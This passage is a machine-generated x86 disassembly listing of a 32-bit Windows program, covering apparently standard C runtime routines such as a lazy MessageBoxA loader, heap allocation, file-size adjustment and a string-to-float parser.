sub eax, edx
add eax, [ebp+arg_14]
lea ecx, [ecx+eax-7]
jmp short loc_424C6E
; ---------------------------------------------------------------------------
loc_424C64: ; CODE XREF: sub_424BF6+5E�j
imul eax, 7
sub eax, edx
add eax, [ebp+arg_14]
add ecx, eax
loc_424C6E: ; CODE XREF: sub_424BF6+6C�j
cmp [ebp+arg_10], 5
jnz short loc_424CAC
cmp [ebp+arg_8], 0
jnz short loc_424C82
mov esi, dword_43D43C[esi]
jmp short loc_424C88
; ---------------------------------------------------------------------------
loc_424C82: ; CODE XREF: sub_424BF6+82�j
mov esi, dword_43D470[esi]
loc_424C88: ; CODE XREF: sub_424BF6+8A�j
cmp ecx, esi
jle short loc_424CAC
sub ecx, 7
jmp short loc_424CAC
; ---------------------------------------------------------------------------
loc_424C91: ; CODE XREF: sub_424BF6+C�j
mov eax, [ebp+arg_C]
test bl, 3
jnz short loc_424CA2
mov ecx, dword_43D438[eax*4]
jmp short loc_424CA9
; ---------------------------------------------------------------------------
loc_424CA2: ; CODE XREF: sub_424BF6+A1�j
mov ecx, dword_43D46C[eax*4]
loc_424CA9: ; CODE XREF: sub_424BF6+AA�j
add ecx, [ebp+arg_18]
loc_424CAC: ; CODE XREF: sub_424BF6+7C�j
; sub_424BF6+94�j ...
cmp [ebp+arg_0], 1
jnz short loc_424CDD
mov eax, [ebp+arg_1C]
mov dword_43D424, ecx
imul eax, 3Ch
add eax, [ebp+arg_20]
mov dword_43D420, ebx
imul eax, 3Ch
add eax, [ebp+arg_24]
imul eax, 3E8h
add eax, [ebp+arg_28]
mov dword_43D428, eax
jmp short loc_424D32
; ---------------------------------------------------------------------------
loc_424CDD: ; CODE XREF: sub_424BF6+BA�j
mov eax, [ebp+arg_1C]
mov dword_43D434, ecx
imul eax, 3Ch
add eax, [ebp+arg_20]
imul eax, 3Ch
add eax, dword_43D390
add eax, [ebp+arg_24]
imul eax, 3E8h
add eax, [ebp+arg_28]
mov dword_43D438, eax
jns short loc_424D15
add eax, 5265C00h
dec ecx
mov dword_43D438, eax
jmp short loc_424D26
; ---------------------------------------------------------------------------
loc_424D15: ; CODE XREF: sub_424BF6+110�j
mov edx, 5265C00h
cmp eax, edx
jl short loc_424D2C
sub eax, edx
inc ecx
mov dword_43D438, eax
loc_424D26: ; CODE XREF: sub_424BF6+11D�j
mov dword_43D434, ecx
loc_424D2C: ; CODE XREF: sub_424BF6+126�j
mov dword_43D430, ebx
loc_424D32: ; CODE XREF: sub_424BF6+E5�j
pop esi
pop ebx
pop ebp
retn
sub_424BF6 endp
; =============== S U B R O U T I N E =======================================
sub_424D36 proc near ; CODE XREF: sub_422E72+2B�p
arg_0 = dword ptr 4
push 4
push 0
push [esp+8+arg_0]
call sub_424D47
add esp, 0Ch
retn
sub_424D36 endp
; =============== S U B R O U T I N E =======================================
sub_424D47 proc near ; CODE XREF: sub_424D36+8�p
arg_0 = byte ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
movzx eax, [esp+arg_0]
mov cl, [esp+arg_8]
test ds:byte_4DCEC1[eax], cl
jnz short loc_424D74
cmp [esp+arg_4], 0
jz short loc_424D6D
movzx eax, word_43C9E2[eax*2]
and eax, [esp+arg_4]
jmp short loc_424D6F
; ---------------------------------------------------------------------------
loc_424D6D: ; CODE XREF: sub_424D47+16�j
xor eax, eax
loc_424D6F: ; CODE XREF: sub_424D47+24�j
test eax, eax
jnz short loc_424D74
retn
; ---------------------------------------------------------------------------
loc_424D74: ; CODE XREF: sub_424D47+F�j
; sub_424D47+2A�j
push 1
pop eax
retn
sub_424D47 endp
; =============== S U B R O U T I N E =======================================
sub_424D78 proc near ; CODE XREF: sub_4235C9+11F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
xor ebx, ebx
cmp ds:dword_4DBC44, ebx
push esi
push edi
jnz short loc_424DC7
push offset aUser32_dll ; "user32.dll"
call dword_4270B8 ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_424DFD
mov esi, dword_4270BC
push offset aMessageboxa ; "MessageBoxA"
push edi
call esi ; GetProcAddress
test eax, eax
mov ds:dword_4DBC44, eax
jz short loc_424DFD
push offset aGetactivewindo ; "GetActiveWindow"
push edi
call esi ; GetProcAddress
push offset aGetlastactivep ; "GetLastActivePopup"
push edi
mov ds:dword_4DBC48, eax
call esi ; GetProcAddress
mov ds:dword_4DBC4C, eax
loc_424DC7: ; CODE XREF: sub_424D78+B�j
mov eax, ds:dword_4DBC48
test eax, eax
jz short loc_424DE6
call eax
mov ebx, eax
test ebx, ebx
jz short loc_424DE6
mov eax, ds:dword_4DBC4C
test eax, eax
jz short loc_424DE6
push ebx
call eax
mov ebx, eax
loc_424DE6: ; CODE XREF: sub_424D78+56�j
; sub_424D78+5E�j ...
push [esp+0Ch+arg_8]
push [esp+10h+arg_4]
push [esp+14h+arg_0]
push ebx
call ds:dword_4DBC44
loc_424DF9: ; CODE XREF: sub_424D78+87�j
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_424DFD: ; CODE XREF: sub_424D78+1C�j
; sub_424D78+33�j
xor eax, eax
jmp short loc_424DF9
sub_424D78 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_424E01 proc near ; CODE XREF: sub_423936+22�p
; sub_423936+3B�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
imul esi, [ebp+arg_4]
cmp esi, 0FFFFFFE0h
push edi
mov [ebp+arg_0], esi
ja short loc_424E22
test esi, esi
jnz short loc_424E1C
push 1
pop esi
loc_424E1C: ; CODE XREF: sub_424E01+16�j
add esi, 0Fh
and esi, 0FFFFFFF0h
loc_424E22: ; CODE XREF: sub_424E01+12�j
; sub_424E01+94�j
xor edi, edi
cmp esi, 0FFFFFFE0h
ja short loc_424E81
mov eax, ds:dword_4DCFE8
cmp eax, 3
jnz short loc_424E4D
mov eax, [ebp+arg_0]
cmp eax, ds:dword_4DCFE0
ja short loc_424E6C
push eax
call sub_41E1CB
mov edi, eax
pop ecx
test edi, edi
jnz short loc_424E97
jmp short loc_424E6C
; ---------------------------------------------------------------------------
loc_424E4D: ; CODE XREF: sub_424E01+30�j
cmp eax, 2
jnz short loc_424E6C
cmp esi, dword_43C9D4
ja short loc_424E6C
mov eax, esi
shr eax, 4
push eax
call sub_41EC6E
mov edi, eax
pop ecx
test edi, edi
jnz short loc_424EAB
loc_424E6C: ; CODE XREF: sub_424E01+3B�j
; sub_424E01+4A�j ...
push esi
push 8
push ds:dword_4DCFE4
call dword_427144 ; RtlAllocateHeap
mov edi, eax
test edi, edi
jnz short loc_424EA5
loc_424E81: ; CODE XREF: sub_424E01+26�j
cmp ds:dword_4DB9DC, 0
jz short loc_424EA5
push esi
call sub_41F312
test eax, eax
pop ecx
jz short loc_424EAE
jmp short loc_424E22
; ---------------------------------------------------------------------------
loc_424E97: ; CODE XREF: sub_424E01+48�j
push [ebp+arg_0]
loc_424E9A: ; CODE XREF: sub_424E01+AB�j
push 0
push edi
call sub_41B590
add esp, 0Ch
loc_424EA5: ; CODE XREF: sub_424E01+7E�j
; sub_424E01+87�j
mov eax, edi
loc_424EA7: ; CODE XREF: sub_424E01+AF�j
pop edi
pop esi
pop ebp
retn
; ---------------------------------------------------------------------------
loc_424EAB: ; CODE XREF: sub_424E01+69�j
push esi
jmp short loc_424E9A
; ---------------------------------------------------------------------------
loc_424EAE: ; CODE XREF: sub_424E01+92�j
xor eax, eax
jmp short loc_424EA7
sub_424E01 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4239DB
loc_424EB2: ; CODE XREF: sub_4239DB+E�j
push esi
push edi
push 3
xor edi, edi
pop esi
cmp ds:dword_4DCC80, esi
jle short loc_424F05
loc_424EC1: ; CODE XREF: sub_4239DB+1528�j
mov eax, ds:dword_4DBC78
mov eax, [eax+esi*4]
test eax, eax
jz short loc_424EFC
test byte ptr [eax+0Ch], 83h
jz short loc_424EE0
push eax
call sub_41B05B
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_424EE0
inc edi
loc_424EE0: ; CODE XREF: sub_4239DB+14F6�j
; sub_4239DB+1502�j
cmp esi, 14h
jl short loc_424EFC
mov eax, ds:dword_4DBC78
push dword ptr [eax+esi*4]
call sub_41B0B1
mov eax, ds:dword_4DBC78
pop ecx
and dword ptr [eax+esi*4], 0
loc_424EFC: ; CODE XREF: sub_4239DB+14F0�j
; sub_4239DB+1508�j
inc esi
cmp esi, ds:dword_4DCC80
jl short loc_424EC1
loc_424F05: ; CODE XREF: sub_4239DB+14E4�j
mov eax, edi
pop edi
pop esi
retn
; END OF FUNCTION CHUNK FOR sub_4239DB
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_424F0A proc near ; CODE XREF: sub_423A33+271�p
var_1000 = byte ptr -1000h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 1000h
call sub_41BB20
push ebx
mov ebx, [ebp+arg_0]
push esi
xor esi, esi
cmp ebx, ds:dword_4DCDA0
jnb loc_42503F
mov eax, ebx
mov ecx, ebx
sar eax, 5
and ecx, 1Fh
mov eax, ds:dword_4DCCA0[eax*4]
test byte ptr [eax+ecx*8+4], 1
jz loc_42503F
push 1
push esi
push ebx
call sub_42272B
add esp, 0Ch
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz loc_425049
push 2
push esi
push ebx
call sub_42272B
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz loc_425049
push edi
mov edi, [ebp+arg_4]
sub edi, eax
test edi, edi
jle short loc_424FEC
push 1000h
lea eax, [ebp+var_1000]
push esi
push eax
call sub_41B590
push 8000h
push ebx
call sub_425B44
add esp, 14h
mov [ebp+arg_4], eax
loc_424FA0: ; CODE XREF: sub_424F0A+BD�j
mov eax, 1000h
cmp edi, eax
jge short loc_424FAB
mov eax, edi
loc_424FAB: ; CODE XREF: sub_424F0A+9D�j
push eax
lea eax, [ebp+var_1000]
push eax
push ebx
call sub_42291D
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz short loc_424FC9
sub edi, eax
test edi, edi
jle short loc_424FDF
jmp short loc_424FA0
; ---------------------------------------------------------------------------
loc_424FC9: ; CODE XREF: sub_424F0A+B5�j
cmp ds:dword_4DB95C, 5
jnz short loc_424FDC
mov ds:dword_4DB958, 0Dh
loc_424FDC: ; CODE XREF: sub_424F0A+C6�j
or esi, 0FFFFFFFFh
loc_424FDF: ; CODE XREF: sub_424F0A+BB�j
push [ebp+arg_4]
push ebx
call sub_425B44
pop ecx
pop ecx
jmp short loc_42502C
; ---------------------------------------------------------------------------
loc_424FEC: ; CODE XREF: sub_424F0A+71�j
jge short loc_42502C
push 0
push [ebp+arg_4]
push ebx
call sub_42272B
push ebx
call sub_4238A2
add esp, 10h
push eax
call dword_427010 ; SetEndOfFile
mov esi, eax
neg esi
sbb esi, esi
neg esi
dec esi
cmp esi, 0FFFFFFFFh
jnz short loc_42502C
mov ds:dword_4DB958, 0Dh
call dword_42708C ; RtlGetLastWin32Error
mov ds:dword_4DB95C, eax
loc_42502C: ; CODE XREF: sub_424F0A+E0�j
; sub_424F0A:loc_424FEC�j ...
push 0
push [ebp+arg_0]
push ebx
call sub_42272B
add esp, 0Ch
mov eax, esi
pop edi
jmp short loc_42504C
; ---------------------------------------------------------------------------
loc_42503F: ; CODE XREF: sub_424F0A+1A�j
; sub_424F0A+36�j
mov ds:dword_4DB958, 9
loc_425049: ; CODE XREF: sub_424F0A+4E�j
; sub_424F0A+63�j
or eax, 0FFFFFFFFh
loc_42504C: ; CODE XREF: sub_424F0A+133�j
pop esi
pop ebx
leave
retn
sub_424F0A endp
; =============== S U B R O U T I N E =======================================
sub_425050 proc near ; CODE XREF: sub_4241CF+2B�p
; sub_4241CF+42�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov edx, [esp+arg_0]
push esi
mov esi, [esp+4+arg_4]
xor eax, eax
lea ecx, [edx+esi]
cmp ecx, edx
jb short loc_425066
cmp ecx, esi
jnb short loc_425069
loc_425066: ; CODE XREF: sub_425050+10�j
push 1
pop eax
loc_425069: ; CODE XREF: sub_425050+14�j
mov edx, [esp+4+arg_8]
pop esi
mov [edx], ecx
retn
sub_425050 endp
; =============== S U B R O U T I N E =======================================
sub_425071 proc near ; CODE XREF: sub_42512A+40�p
; sub_42512A+61�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
push edi
mov edi, [esp+8+arg_4]
push esi
push dword ptr [edi]
push dword ptr [esi]
call sub_425050
add esp, 0Ch
test eax, eax
jz short loc_4250A3
lea eax, [esi+4]
push eax
push 1
push dword ptr [eax]
call sub_425050
add esp, 0Ch
test eax, eax
jz short loc_4250A3
inc dword ptr [esi+8]
loc_4250A3: ; CODE XREF: sub_425071+19�j
; sub_425071+2D�j
lea eax, [esi+4]
push eax
push dword ptr [edi+4]
push dword ptr [eax]
call sub_425050
add esp, 0Ch
test eax, eax
jz short loc_4250BB
inc dword ptr [esi+8]
loc_4250BB: ; CODE XREF: sub_425071+45�j
lea eax, [esi+8]
push eax
push dword ptr [edi+8]
push dword ptr [eax]
call sub_425050
add esp, 0Ch
pop edi
pop esi
retn
sub_425071 endp
; =============== S U B R O U T I N E =======================================
sub_4250CF proc near ; CODE XREF: sub_42512A+30�p
; sub_42512A+36�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
push edi
mov esi, [eax]
mov edi, [eax+4]
mov ecx, esi
add esi, esi
mov [eax], esi
lea esi, [edi+edi]
shr ecx, 1Fh
or esi, ecx
mov ecx, [eax+8]
mov edx, edi
mov [eax+4], esi
shr edx, 1Fh
shl ecx, 1
or ecx, edx
pop edi
mov [eax+8], ecx
pop esi
retn
sub_4250CF endp
; =============== S U B R O U T I N E =======================================
sub_4250FD proc near ; CODE XREF: sub_4256C2+1C8�p
; sub_425BBA+17D�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
push edi
mov edx, [eax+8]
mov ecx, [eax+4]
mov esi, edx
mov edi, ecx
shl esi, 1Fh
shr ecx, 1
or ecx, esi
mov [eax+4], ecx
mov ecx, [eax]
shl edi, 1Fh
shr ecx, 1
shr edx, 1
or ecx, edi
pop edi
mov [eax+8], edx
mov [eax], ecx
pop esi
retn
sub_4250FD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42512A proc near ; CODE XREF: sub_4251F1+3CA�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
mov eax, [ebp+arg_4]
push ebx
mov ebx, [ebp+arg_8]
xor edx, edx
cmp eax, edx
push esi
mov [ebp+var_4], 404Eh
mov [ebx], edx
mov [ebx+4], edx
mov [ebx+8], edx
jbe short loc_42519E
push edi
mov [ebp+arg_8], eax
loc_425151: ; CODE XREF: sub_42512A+6F�j
mov esi, ebx
lea edi, [ebp+var_10]
movsd
movsd
push ebx
movsd
call sub_4250CF
push ebx
call sub_4250CF
lea eax, [ebp+var_10]
push eax
push ebx
call sub_425071
push ebx
call sub_4250CF
mov eax, [ebp+arg_0]
and [ebp+var_C], 0
and [ebp+var_8], 0
movsx eax, byte ptr [eax]
mov [ebp+var_10], eax
lea eax, [ebp+var_10]
push eax
push ebx
call sub_425071
add esp, 1Ch
inc [ebp+arg_0]
dec [ebp+arg_8]
jnz short loc_425151
xor edx, edx
pop edi
loc_42519E: ; CODE XREF: sub_42512A+21�j
; sub_42512A+9F�j
cmp [ebx+8], edx
jnz short loc_4251CB
mov ecx, [ebx+4]
mov eax, ecx
shr eax, 10h
mov [ebx+8], eax
mov eax, [ebx]
mov esi, eax
shr esi, 10h
shl ecx, 10h
or esi, ecx
shl eax, 10h
add [ebp+var_4], 0FFF0h
mov [ebx+4], esi
mov [ebx], eax
jmp short loc_42519E
; ---------------------------------------------------------------------------
loc_4251CB: ; CODE XREF: sub_42512A+77�j
mov esi, 8000h
loc_4251D0: ; CODE XREF: sub_42512A+B9�j
test [ebx+8], esi
jnz short loc_4251E5
push ebx
call sub_4250CF
add [ebp+var_4], 0FFFFh
pop ecx
jmp short loc_4251D0
; ---------------------------------------------------------------------------
loc_4251E5: ; CODE XREF: sub_42512A+A9�j
mov ax, word ptr [ebp+var_4]
pop esi
mov [ebx+0Ah], ax
pop ebx
leave
retn
sub_42512A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4251F1 proc near ; CODE XREF: sub_424518+17�p
; sub_424545+17�p
var_5C = byte ptr -5Ch
var_45 = byte ptr -45h
var_40 = dword ptr -40h
var_3A = dword ptr -3Ah
var_36 = dword ptr -36h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 5Ch
push ebx
push esi
push edi
mov edi, [ebp+arg_8]
lea eax, [ebp+var_5C]
push 1
mov [ebp+var_C], eax
xor eax, eax
pop edx
mov [ebp+var_28], eax
mov [ebp+var_18], edx
mov [ebp+var_4], eax
mov [ebp+var_10], eax
mov [ebp+var_24], eax
mov [ebp+var_20], eax
mov [ebp+var_2C], eax
mov [ebp+var_30], eax
mov [ebp+var_1C], eax
mov [ebp+var_8], eax
mov [ebp+var_14], eax
mov [ebp+arg_8], edi
loc_42522C: ; CODE XREF: sub_4251F1+52�j
mov cl, [edi]
cmp cl, 20h
jz short loc_425242
cmp cl, 9
jz short loc_425242
cmp cl, 0Ah
jz short loc_425242
cmp cl, 0Dh
jnz short loc_425245
loc_425242: ; CODE XREF: sub_4251F1+40�j
; sub_4251F1+45�j ...
inc edi
jmp short loc_42522C
; ---------------------------------------------------------------------------
loc_425245: ; CODE XREF: sub_4251F1+4F�j
push 4
pop esi
loc_425248: ; CODE XREF: sub_4251F1+AE�j
; sub_4251F1+B7�j ...
mov bl, [edi]
inc edi
cmp eax, 0Bh ; switch 12 cases
ja loc_4254CB ; default
; jumptable 00425254 case 10
jmp off_425692[eax*4] ; switch jump
loc_42525B: ; DATA XREF: UPX0:off_425692�o
cmp bl, 31h ; jumptable 00425254 case 0
jl short loc_42526C
cmp bl, 39h
jg short loc_42526C
loc_425265: ; CODE XREF: sub_4251F1+C4�j
; sub_4251F1+118�j
push 3
jmp loc_425489
; ---------------------------------------------------------------------------
loc_42526C: ; CODE XREF: sub_4251F1+6D�j
; sub_4251F1+72�j
cmp bl, byte_43CBE8
jnz short loc_42527B
loc_425274: ; CODE XREF: sub_4251F1+124�j
push 5
jmp loc_4254C1
; ---------------------------------------------------------------------------
loc_42527B: ; CODE XREF: sub_4251F1+81�j
movsx eax, bl
sub eax, 2Bh
jz short loc_4252A1
dec eax
dec eax
jz short loc_425295
sub eax, 3
jnz loc_425564
jmp loc_425324
; ---------------------------------------------------------------------------
loc_425295: ; CODE XREF: sub_4251F1+94�j
push 2
mov [ebp+var_28], 8000h
pop eax
jmp short loc_425248
; ---------------------------------------------------------------------------
loc_4252A1: ; CODE XREF: sub_4251F1+90�j
and [ebp+var_28], 0
push 2
pop eax
jmp short loc_425248
; ---------------------------------------------------------------------------
loc_4252AA: ; CODE XREF: sub_4251F1+63�j
; DATA XREF: UPX0:off_425692�o
cmp bl, 31h ; jumptable 00425254 case 1
mov [ebp+var_10], edx
jl short loc_4252B7
cmp bl, 39h
jle short loc_425265
loc_4252B7: ; CODE XREF: sub_4251F1+BF�j
cmp bl, byte_43CBE8
jz loc_42537F
cmp bl, 2Bh
jz short loc_4252F9
cmp bl, 2Dh
jz short loc_4252F9
cmp bl, 30h
jz short loc_425324
loc_4252D2: ; CODE XREF: sub_4251F1+207�j
cmp bl, 43h
jle loc_425564
cmp bl, 45h
jle short loc_4252F2
cmp bl, 63h
jle loc_425564
cmp bl, 65h
jg loc_425564
loc_4252F2: ; CODE XREF: sub_4251F1+ED�j
push 6
jmp loc_4254C1
; ---------------------------------------------------------------------------
loc_4252F9: ; CODE XREF: sub_4251F1+D5�j
; sub_4251F1+DA�j ...
dec edi
push 0Bh
jmp loc_4254C1
; ---------------------------------------------------------------------------
loc_425301: ; CODE XREF: sub_4251F1+63�j
; DATA XREF: UPX0:off_425692�o
cmp bl, 31h ; jumptable 00425254 case 2
jl short loc_42530F
cmp bl, 39h
jle loc_425265
loc_42530F: ; CODE XREF: sub_4251F1+113�j
cmp bl, byte_43CBE8
jz loc_425274
cmp bl, 30h
jnz loc_4254D9
loc_425324: ; CODE XREF: sub_4251F1+9F�j
; sub_4251F1+DF�j
mov eax, edx
jmp loc_425248
; ---------------------------------------------------------------------------
loc_42532B: ; CODE XREF: sub_4251F1+63�j
; DATA XREF: UPX0:off_425692�o
mov [ebp+var_10], edx ; jumptable 00425254 case 3
loc_42532E: ; CODE XREF: sub_4251F1+184�j
cmp dword_43CBE4, edx
jle short loc_425347
movzx eax, bl
push esi
push eax
call sub_41F515
pop ecx
pop ecx
push 1
pop edx
jmp short loc_425355
; ---------------------------------------------------------------------------
loc_425347: ; CODE XREF: sub_4251F1+143�j
mov ecx, off_43C9D8
movzx eax, bl
mov al, [ecx+eax*2]
and eax, esi
loc_425355: ; CODE XREF: sub_4251F1+154�j
test eax, eax
jz short loc_425377
cmp [ebp+var_4], 19h
jnb short loc_42536F
mov eax, [ebp+var_C]
inc [ebp+var_4]
sub bl, 30h
inc [ebp+var_C]
mov [eax], bl
jmp short loc_425372
; ---------------------------------------------------------------------------
loc_42536F: ; CODE XREF: sub_4251F1+16C�j
inc [ebp+var_8]
loc_425372: ; CODE XREF: sub_4251F1+17C�j
mov bl, [edi]
inc edi
jmp short loc_42532E
; ---------------------------------------------------------------------------
loc_425377: ; CODE XREF: sub_4251F1+166�j
cmp bl, byte_43CBE8
jnz short loc_4253E6
loc_42537F: ; CODE XREF: sub_4251F1+CC�j
mov eax, esi
jmp loc_425248
; ---------------------------------------------------------------------------
loc_425386: ; CODE XREF: sub_4251F1+63�j
; DATA XREF: UPX0:off_425692�o
cmp [ebp+var_4], 0 ; jumptable 00425254 case 4
mov [ebp+var_10], edx
mov [ebp+var_24], edx
jnz short loc_42539F
loc_425392: ; CODE XREF: sub_4251F1+1AC�j
cmp bl, 30h
jnz short loc_42539F
dec [ebp+var_8]
mov bl, [edi]
inc edi
jmp short loc_425392
; ---------------------------------------------------------------------------
loc_42539F: ; CODE XREF: sub_4251F1+19F�j
; sub_4251F1+1A4�j ...
cmp dword_43CBE4, edx
jle short loc_4253B8
movzx eax, bl
push esi
push eax
call sub_41F515
pop ecx
pop ecx
push 1
pop edx
jmp short loc_4253C6
; ---------------------------------------------------------------------------
loc_4253B8: ; CODE XREF: sub_4251F1+1B4�j
mov ecx, off_43C9D8
movzx eax, bl
mov al, [ecx+eax*2]
and eax, esi
loc_4253C6: ; CODE XREF: sub_4251F1+1C5�j
test eax, eax
jz short loc_4253E6
cmp [ebp+var_4], 19h
jnb short loc_4253E1
mov eax, [ebp+var_C]
inc [ebp+var_4]
sub bl, 30h
inc [ebp+var_C]
dec [ebp+var_8]
mov [eax], bl
loc_4253E1: ; CODE XREF: sub_4251F1+1DD�j
mov bl, [edi]
inc edi
jmp short loc_42539F
; ---------------------------------------------------------------------------
loc_4253E6: ; CODE XREF: sub_4251F1+18C�j
; sub_4251F1+1D7�j
cmp bl, 2Bh
jz loc_4252F9
cmp bl, 2Dh
jz loc_4252F9
jmp loc_4252D2
; ---------------------------------------------------------------------------
loc_4253FD: ; CODE XREF: sub_4251F1+63�j
; DATA XREF: UPX0:off_425692�o
cmp dword_43CBE4, edx ; jumptable 00425254 case 5
mov [ebp+var_24], edx
jle short loc_425419
movzx eax, bl
push esi
push eax
call sub_41F515
pop ecx
pop ecx
push 1
pop edx
jmp short loc_425427
; ---------------------------------------------------------------------------
loc_425419: ; CODE XREF: sub_4251F1+215�j
mov ecx, off_43C9D8
movzx eax, bl
mov al, [ecx+eax*2]
and eax, esi
loc_425427: ; CODE XREF: sub_4251F1+226�j
test eax, eax
jz loc_4254D9
mov eax, esi
jmp short loc_42548A
; ---------------------------------------------------------------------------
loc_425433: ; CODE XREF: sub_4251F1+63�j
; DATA XREF: UPX0:off_425692�o
lea ecx, [edi-2] ; jumptable 00425254 case 6
cmp bl, 31h
mov [ebp+arg_8], ecx
jl short loc_425443
cmp bl, 39h
jle short loc_425487
loc_425443: ; CODE XREF: sub_4251F1+24B�j
movsx eax, bl
sub eax, 2Bh
jz short loc_4254BF
dec eax
dec eax
jz short loc_4254B3
sub eax, 3
jnz loc_425567
loc_425458: ; CODE XREF: sub_4251F1+2A4�j
push 8
jmp short loc_4254C1
; ---------------------------------------------------------------------------
loc_42545C: ; CODE XREF: sub_4251F1+63�j
; DATA XREF: UPX0:off_425692�o
mov [ebp+var_20], edx ; jumptable 00425254 case 8
loc_42545F: ; CODE XREF: sub_4251F1+276�j
cmp bl, 30h
jnz short loc_425469
mov bl, [edi]
inc edi
jmp short loc_42545F
; ---------------------------------------------------------------------------
loc_425469: ; CODE XREF: sub_4251F1+271�j
cmp bl, 31h
jl loc_425564
cmp bl, 39h
jg loc_425564
jmp short loc_425487
; ---------------------------------------------------------------------------
loc_42547D: ; CODE XREF: sub_4251F1+63�j
; DATA XREF: UPX0:off_425692�o
cmp bl, 31h ; jumptable 00425254 case 7
jl short loc_425490
cmp bl, 39h
jg short loc_425490
loc_425487: ; CODE XREF: sub_4251F1+250�j
; sub_4251F1+28A�j
push 9
loc_425489: ; CODE XREF: sub_4251F1+76�j
pop eax
loc_42548A: ; CODE XREF: sub_4251F1+240�j
dec edi
jmp loc_425248
; ---------------------------------------------------------------------------
loc_425490: ; CODE XREF: sub_4251F1+28F�j
; sub_4251F1+294�j
cmp bl, 30h
jnz short loc_4254D9
jmp short loc_425458
; ---------------------------------------------------------------------------
loc_425497: ; CODE XREF: sub_4251F1+63�j
; DATA XREF: UPX0:off_425692�o
cmp [ebp+arg_18], 0 ; jumptable 00425254 case 11
jz short loc_4254C7
movsx eax, bl
lea ecx, [edi-1]
sub eax, 2Bh
mov [ebp+arg_8], ecx
jz short loc_4254BF
dec eax
dec eax
jnz loc_425567
loc_4254B3: ; CODE XREF: sub_4251F1+25C�j
or [ebp+var_18], 0FFFFFFFFh
push 7
pop eax
jmp loc_425248
; ---------------------------------------------------------------------------
loc_4254BF: ; CODE XREF: sub_4251F1+258�j
; sub_4251F1+2B8�j
push 7
loc_4254C1: ; CODE XREF: sub_4251F1+85�j
; sub_4251F1+103�j ...
pop eax
jmp loc_425248
; ---------------------------------------------------------------------------
loc_4254C7: ; CODE XREF: sub_4251F1+2AA�j
push 0Ah
dec edi
pop eax
loc_4254CB: ; CODE XREF: sub_4251F1+5D�j
; sub_4251F1+63�j
; DATA XREF: ...
cmp eax, 0Ah ; default
; jumptable 00425254 case 10
jz loc_425569
jmp loc_425248
; ---------------------------------------------------------------------------
loc_4254D9: ; CODE XREF: sub_4251F1+12D�j
; sub_4251F1+238�j ...
mov edi, [ebp+arg_8]
jmp loc_425569
; ---------------------------------------------------------------------------
loc_4254E1: ; CODE XREF: sub_4251F1+63�j
; DATA XREF: UPX0:off_425692�o
mov [ebp+var_20], 1 ; jumptable 00425254 case 9
xor esi, esi
loc_4254EA: ; CODE XREF: sub_4251F1+339�j
cmp dword_43CBE4, 1
jle short loc_425502
movzx eax, bl
push 4
push eax
call sub_41F515
pop ecx
pop ecx
jmp short loc_425511
; ---------------------------------------------------------------------------
loc_425502: ; CODE XREF: sub_4251F1+300�j
mov ecx, off_43C9D8
movzx eax, bl
mov al, [ecx+eax*2]
and eax, 4
loc_425511: ; CODE XREF: sub_4251F1+30F�j
test eax, eax
jz short loc_425531
movsx ecx, bl
lea eax, [esi+esi*4]
lea esi, [ecx+eax*2-30h]
cmp esi, 1450h
jg short loc_42552C
mov bl, [edi]
inc edi
jmp short loc_4254EA
; ---------------------------------------------------------------------------
loc_42552C: ; CODE XREF: sub_4251F1+334�j
mov esi, 1451h
loc_425531: ; CODE XREF: sub_4251F1+322�j
mov [ebp+var_1C], esi
loc_425534: ; CODE XREF: sub_4251F1+371�j
cmp dword_43CBE4, 1
jle short loc_42554C
movzx eax, bl
push 4
push eax
call sub_41F515
pop ecx
pop ecx
jmp short loc_42555B
; ---------------------------------------------------------------------------
loc_42554C: ; CODE XREF: sub_4251F1+34A�j
mov ecx, off_43C9D8
movzx eax, bl
mov al, [ecx+eax*2]
and eax, 4
loc_42555B: ; CODE XREF: sub_4251F1+359�j
test eax, eax
jz short loc_425564
mov bl, [edi]
inc edi
jmp short loc_425534
; ---------------------------------------------------------------------------
loc_425564: ; CODE XREF: sub_4251F1+99�j
; sub_4251F1+E4�j ...
dec edi
jmp short loc_425569
; ---------------------------------------------------------------------------
loc_425567: ; CODE XREF: sub_4251F1+261�j
; sub_4251F1+2BC�j
mov edi, ecx
loc_425569: ; CODE XREF: sub_4251F1+2DD�j
; sub_4251F1+2EB�j ...
mov eax, [ebp+arg_4]
cmp [ebp+var_10], 0
